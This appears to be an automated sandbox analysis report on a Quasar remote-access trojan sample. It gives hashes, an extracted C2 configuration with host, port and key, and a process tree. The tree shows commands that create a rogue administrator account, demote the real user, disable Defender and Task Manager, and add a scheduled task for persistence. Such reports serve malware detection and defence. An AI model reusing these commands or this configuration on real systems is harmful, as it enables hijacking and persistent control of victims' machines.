Overview

overview

10

Static

static

10

Lose2himato.exe

windows7-x64

1

Lose2himato.exe

windows10-2004-x64

Analysis

  • max time kernel
    69s
  • max time network
    75s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 19:15

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Lose2himato.exe

  • Size

    135.3MB

  • MD5

    30b32bc02534355b906a37951b458808

  • SHA1

    61eada367af3558e45c8583e174cdef13e68b93b

  • SHA256

    6f08d8eb4044dd872b38ff8d6a2b6e86efa9f7d777cb1b09e1f575bfed9467a2

  • SHA512

    8735788ded8836ac0b5be86356263cba2899367964ca8711a8d89b84cecf8c50be799274bfae5d4c6b8bc5d4dea7f04f836f10bf230041677c61977299887839

  • SSDEEP

    786432:zl5HNB9mAbrDMZBfPPgs9TFMd15DeSqVO0EQWW2IxEm+KoZd7APUF85n9wwTtLwG:J5gOsPfmZ0/EmREdEPUF85nSUgTI

Score
10/10
quasaroffice04defense_evasiondiscoveryevasionransomwarespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

himato667-58401.portmap.host:58401

Mutex

0e2bc079-3316-407c-a26f-115195d9fe5b

Attributes
  • encryption_key

    D14CC6B8490A41A48C1E115285B6932B9A857EA0

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Disables Task Manager via registry modification
    evasion
  • Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

    defense_evasion
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lose2himato.exe
    "C:\Users\Admin\AppData\Local\Temp\Lose2himato.exe"
    1⤵
    • Checks computer location settings
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\SysWOW64\net.exe
        net user OWN3DbyHXM4TO /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Windows\SysWOW64\net.exe
        net user OWN3DbyHXM4TO Test
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
          4⤵
          • System Location Discovery: System Language Discovery
          PID:704
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "OWN3DbyHXM4TO" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
      2⤵
      • Indicator Removal: Network Share Connection Removal
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Admin" /delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1464
    • C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
      "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:440
      • C:\Windows\system32\SubDir\Client.exe
        "C:\Windows\system32\SubDir\Client.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1072
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1xKeyi5KcMKN.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4056
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
              PID:3580
            • C:\Windows\system32\PING.EXE
              ping -n 10 localhost
              5⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2956
            • C:\Windows\system32\SubDir\Client.exe
              "C:\Windows\system32\SubDir\Client.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:768
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3740
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RwijEhf9UHIt.bat" "
                6⤵
                  PID:3084
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:2936
                    • C:\Windows\system32\PING.EXE
                      ping -n 10 localhost
                      7⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:4580
                    • C:\Windows\system32\SubDir\Client.exe
                      "C:\Windows\system32\SubDir\Client.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:5716
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                        8⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5928
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iLHdomMqQ84D.bat" "
                        8⤵
                          PID:6140
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            9⤵
                              PID:5196
                            • C:\Windows\system32\PING.EXE
                              ping -n 10 localhost
                              9⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:1332
                            • C:\Windows\system32\SubDir\Client.exe
                              "C:\Windows\system32\SubDir\Client.exe"
                              9⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:884
                              • C:\Windows\SYSTEM32\schtasks.exe
                                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                                10⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:5468
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oC8cbSowU7FX.bat" "
                                10⤵
                                  PID:5812
                                  • C:\Windows\system32\chcp.com
                                    chcp 65001
                                    11⤵
                                      PID:5932
                                    • C:\Windows\system32\PING.EXE
                                      ping -n 10 localhost
                                      11⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Runs ping.exe
                                      PID:5548
                                    • C:\Windows\system32\SubDir\Client.exe
                                      "C:\Windows\system32\SubDir\Client.exe"
                                      11⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5332
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                                        12⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4224
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKeFtiYCgpEc.bat" "
                                        12⤵
                                          PID:548
                                          • C:\Windows\system32\chcp.com
                                            chcp 65001
                                            13⤵
                                              PID:4456
                                            • C:\Windows\system32\PING.EXE
                                              ping -n 10 localhost
                                              13⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:2516
                                            • C:\Windows\system32\SubDir\Client.exe
                                              "C:\Windows\system32\SubDir\Client.exe"
                                              13⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:5604
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                                                14⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5400
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xzzIzv7WLRpb.bat" "
                                                14⤵
                                                  PID:4540
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 65001
                                                    15⤵
                                                      PID:5668
                                                    • C:\Windows\system32\PING.EXE
                                                      ping -n 10 localhost
                                                      15⤵
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      • Runs ping.exe
                                                      PID:2508
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
                            2⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1028
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2664
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4264
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3296
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1632
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1272
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2516
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4932
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1928
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
                              3⤵
                                PID:2428
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeeac646f8,0x7ffeeac64708,0x7ffeeac64718
                                  4⤵
                                    PID:1588
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12190655202084161576,9499635611112659034,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                    4⤵
                                      PID:1960
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12190655202084161576,9499635611112659034,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2336
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4568
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
                                    3⤵
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:392
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffeeac646f8,0x7ffeeac64708,0x7ffeeac64718
                                      4⤵
                                        PID:2636
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
                                        4⤵
                                          PID:2888
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:704
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
                                          4⤵
                                            PID:1500
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                            4⤵
                                              PID:4056
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                              4⤵
                                                PID:1560
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
                                                4⤵
                                                  PID:2808
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
                                                  4⤵
                                                    PID:5168
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                                                    4⤵
                                                      PID:5204
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                                                      4⤵
                                                        PID:3880
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5336 /prefetch:8
                                                        4⤵
                                                          PID:3864
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3616 /prefetch:8
                                                          4⤵
                                                          • Modifies registry class
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2168
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
                                                          4⤵
                                                            PID:1040
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                            4⤵
                                                              PID:5560
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
                                                              4⤵
                                                                PID:6016
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5476
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
                                                                4⤵
                                                                  PID:1992
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
                                                                  4⤵
                                                                    PID:5492
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                                    4⤵
                                                                      PID:1920
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
                                                                      4⤵
                                                                        PID:4580
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
